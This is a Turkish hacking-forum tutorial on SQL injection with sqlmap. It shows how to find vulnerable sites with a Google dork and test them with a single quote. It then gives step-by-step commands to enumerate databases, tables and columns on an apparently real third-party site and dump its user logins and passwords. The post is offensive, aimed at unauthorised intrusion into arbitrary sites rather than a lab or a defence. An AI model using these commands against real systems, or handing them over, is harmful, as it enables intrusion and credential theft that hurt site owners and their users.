Hoşgeldin Misafir

SQLi Database Sızma

MiRaT

13 Kas 2017
2,077 Mesaj

Aktiflik

Seviye

Deneyim

TIM / GÖREV:
-SQLi Database Nedir?--


-SQLi: verileri yönetmek ve tasarlamak için kullanılan bir veritabanı yönetim sistemidir.--
-Database: bir sitenin veritabanıdır,bilgilerin kayıtların tutulduğu yerdir.--

-##ŞİMDİ BU VERİTABANINA NASIL GİRECEZ DİYECEKSİNİZ##--

-Hemen başlayalım..--

-Bu işin iki yolu var.--

-Birincisi Windowsta ;--
-*Havij--
-*Safe3 programıyla (Acunetix önerende var)--

-İkincisi Linux [Sanal Makine] ;--
-*Sqlmap--
-*Admin panel --

-Evet bunları tanıttık ;--

-#İkinci Yolu göstercem size--

-Şimdi sanal makinemizi açalım.--
-Terminalimize sqlmap --help komutunu girerek,neler yapabileceğimiz bize --
-listenleniyor.--


-
RO4n0Y.png
--


-sqlmap -g "dorkumuz"--
-Örneğin; sqlmap -g "inurl:index.php?id=" --
-Not:--
-y evet n hayır q çıkış demektir.--
-bu siteye inject olmak istiyorsanız Y --
-başka site isterseniz N--


-
ZOa9Z3.png
--



-Bu dorku google yapıştırsanız gene aynı sonucu alırsınız.--



-
d7a7y7.png
--



-Sıra geldi sitemize sızmak veritabanına inmek için açık.--
-Bu en basiti arkadaşlar sitelerimize tıklıyoruz.Açık olduğunu anlamak için--
-sitenin sonuna tek ' yazıp enterlıyoruz.--

-
JOMOPj.png
--


-Sitenin sonuna tırnak koyup enterladığımda bana bu site yukarda hata yazısı --
-verdi,kısaca açık olduğunu anlatmak istedi peki şimdi napıyoruz.--

-Terminalimize su komutları giriyoruz.--
-sqlmap -u "www.hedefsite.com/index.php?id='" --dbs--
--u url --
---dbs veritabanı --
-sitenin sonuna tek tırnağı unutmayın '--

-Örneğin ;--
-sqlmap -u "http://cecit.es/news.php?id=99'" --dbs--


-
vJljbA.png
--



-Karşımıza gelenlere Y dedik ve bu geldi napcaz??--
-Burası artık sitenin veritabanı arkadaşlar.Şimdi tabloları ve bilgileri --
-cekecez.(e-mail,phone,şifreler vs.)--


-
By1LLV.png
--


-Öncelikle tablomuzu seçelim.--
-Buraya dikkat.--
-sqlmap -u "http://cecit.es/news.php?id=99'" -D admin_cecit --tables--
---tables yani tabloları aç veritabanın içindeki klasör gibi düşünün.--


-
ZOa9Zo.png
--



-
LOXbyV.png
--


-Tablolarımızı bulduk.Şimdi dökümanlara(Kolon) girelim neler varmış.--
-Hepsini dikkatlice yaparsanız mantıkgı kavrarsınız.--
-sqlmap -u "http://cecit.es/news.php?id=99'" -D admin_cecit -T utilisateur --columns--


-
Qp0V7g.png
--



-
XEjPXD.png
--


-Gördüğünüz gibi şifre,profil,nom o ne bilmiyorum xd,giriş.--
-Şimdi bunlar ne işime yarıyacak nasıl öğrencem felan filan cok basit arkadaşlar--
---dump etmek veri çekmek diğer adı--
-sqlmap -u "http://cecit.es/news.php?id=99'" -D admin_cecit -T utilisateur -C nom,login,password --dump--


-
bLaBGj.png
--


-ve mutlu son.Arkadaşlar sqli injection bundan ibaret bazen şifreler olmayabilir,en son güncel girilen kayıtlar bunlar çoğunluk doğru çıkar.Zaten böyle sitelere Bypass--
-yiyor.Benim görevim bu kadar.--


-
4G3aMq.png
-
-